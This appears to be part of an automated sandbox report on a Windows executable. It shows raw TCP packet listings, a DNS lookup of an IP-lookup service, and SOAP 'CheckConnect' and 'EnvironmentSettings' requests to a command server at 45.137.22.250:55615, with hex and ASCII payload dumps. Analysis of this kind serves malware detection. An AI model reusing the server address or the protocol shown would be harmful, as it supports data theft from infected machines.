Dec 26, 2024 17:42:21.365338087 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.365350962 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.365386009 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.365436077 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.365448952 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.365499973 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.365514040 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.474522114 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.474574089 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.474699974 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.474714041 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.474852085 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.474867105 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.474991083 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.475030899 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.475073099 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.475085020 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.475162983 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.475210905 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.475393057 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.475404978 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.475438118 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.475505114 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.475564003 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.475577116 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.475759029 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.475771904 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.475840092 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.475852966 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.475914001 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.475954056 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.476062059 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.476073980 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.476212025 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.476224899 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.476346016 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.476357937 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.476473093 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.476495028 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.476514101 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.476622105 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.476663113 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.476722956 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.476737022 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.476880074 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.476959944 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.476974964 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.477014065 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.477031946 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.477133989 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.477157116 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.477238894 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.477300882 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.477381945 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.477404118 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.477519035 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.477530956 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.477608919 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.477652073 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.477762938 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.477775097 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.477885962 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.477899075 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.477988005 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.478009939 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.478106976 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.478143930 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.478286028 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.478298903 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.478359938 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.478415966 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.478543043 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.478554964 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.478610992 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.478625059 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.478718996 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.478813887 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.478828907 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.478856087 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.478970051 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.478982925 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.479057074 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.479079008 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.479331017 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.479343891 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.479366064 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.479420900 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.479487896 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.479511023 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.479607105 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.479696989 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.479710102 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.479721069 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.479866028 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.479878902 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.479957104 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.479969978 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.480036974 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.480103016 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.480215073 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.480236053 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.480340958 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.480385065 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.480519056 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.480530977 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.480634928 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.480685949 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.480827093 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.480870008 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.480976105 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.481004000 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.481112957 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.481163025 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.481209040 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.481270075 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.481317043 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.481431007 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.481445074 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.481479883 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.481601000 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.481621981 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.481726885 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.481750011 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.481884003 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.481901884 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.481941938 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.482023954 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.482089996 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.482120037 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.482219934 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.482278109 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.482398987 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.482470036 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.482657909 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.482716084 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.482728958 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.482753038 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.482892990 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.482995033 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.483124971 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.483138084 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.483159065 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.483171940 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.483228922 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.483381987 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.483395100 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.483407974 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.483506918 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.483519077 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.483683109 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.483695030 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.483732939 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.483792067 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.483839035 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.483860970 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.483977079 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.483989954 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.484067917 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.484107971 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.484169960 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.484239101 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.484261036 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.484425068 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.484438896 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.484602928 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.484616041 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.484776974 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.484790087 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.484880924 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.484894037 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.484905958 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.484978914 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.485029936 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.485080957 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.485207081 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.485241890 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.485368013 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.485492945 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.485542059 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.485872984 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.486166000 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.486249924 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.486335039 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.486377001 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.486457109 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.486526012 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.486583948 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.486695051 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.486778975 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.486836910 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.486885071 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.486996889 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.487051010 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.487205029 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.487291098 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.487370968 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.487416983 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.487483025 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.487531900 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.487622976 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.487696886 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.487802029 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.487904072 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.487952948 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.488051891 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.488161087 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.488174915 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.488287926 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.488400936 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.488480091 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.488568068 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.488703966 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.488715887 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.488809109 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.488895893 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.488950014 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.489031076 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.489145041 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.489228964 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.489319086 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.489398003 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.489501953 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.489567995 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.489646912 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.489762068 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.489839077 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.490011930 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.490025997 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.490107059 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.490183115 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.490279913 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.490339041 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.490415096 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.490510941 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.490554094 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.490685940 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.490803957 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.490947008 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.491266966 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.491468906 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.491638899 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.491673946 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.492036104 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.492472887 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.492597103 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.492650032 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.492840052 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.492858887 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.521496058 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.567441940 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:21.594007969 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.594160080 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.594218969 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.594259024 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.594299078 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.594404936 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.594443083 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.594566107 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.594610929 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.594779015 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.594800949 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.594856977 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.594978094 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.595042944 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:21.595295906 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:21.595751047 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.595817089 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:21.596788883 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.714677095 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.714812040 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.714915991 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.715373993 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.715398073 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.715444088 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:22.157361984 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:22.171821117 CET	49737	55615	192.168.2.4	45.137.22.250

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 26, 2024 17:42:14.474952936 CET	55217	53	192.168.2.4	1.1.1.1

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 26, 2024 17:42:14.474952936 CET	192.168.2.4	1.1.1.1	0xda35	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 26, 2024 17:42:14.613702059 CET	1.1.1.1	192.168.2.4	0xda35	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

45.137.22.250:55615

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	45.137.22.250	55615	7532	C:\Users\user\Desktop\ljMiHZ8MwZ.exe

Timestamp	Bytes transferred	Direction	Data
Dec 26, 2024 17:42:07.534334898 CET	240	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: 45.137.22.250:55615 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Dec 26, 2024 17:42:08.849143028 CET	359	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Thu, 26 Dec 2024 16:42:08 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Dec 26, 2024 17:42:13.924590111 CET	223	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: 45.137.22.250:55615 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate
Dec 26, 2024 17:42:14.359513998 CET	1236	IN	HTTP/1.1 200 OK Content-Length: 9976 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Thu, 26 Dec 2024 16:42:14 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED] Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse 